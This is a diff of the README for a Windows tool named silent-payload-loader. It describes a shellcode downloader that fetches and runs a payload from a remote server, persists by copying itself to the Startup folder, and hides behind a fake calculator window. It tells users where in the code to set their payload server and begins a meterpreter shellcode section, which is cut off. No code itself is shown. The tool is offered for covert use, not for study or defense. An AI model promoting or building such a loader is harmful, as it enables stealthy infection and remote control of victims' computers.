SpectrTech/silent-payload-loader/README.md

 # silent-payload-loader

-**silent-payload-loader** is a lightweight Windows tool designed to download and execute a payload from a remote server while ensuring persistence by copying itself to the Windows Startup folder.
-The tool runs silently in the background, allowing users to integrate their own applications instead of the default calculator interface that is displayed in the foreground.
+Powerfull shellcode downloader, I am not good at writing readmes :> You can replace the fake calc application in the foreground with your own. (calc code: Line 167 - 194) Start your application from line 167 (The comments should help you)

-**Note**: You need to change the defined PAYLOAD in line 15 to your server hosting the payload.bin
+**Note**: You need to change the defined PAYLOAD_URL in line 18 to your server hosting the payload.bin

-## Features:
-- Downloads and executes a remote payload.
-- Ensures persistence by copying itself to the Windows Startup folder.
-- Hides its malicious actions by running a fake calculator.
-- Executes payloads silently in the background.

 ## Generate shellcode:
 Example for a meterpreter (64bit):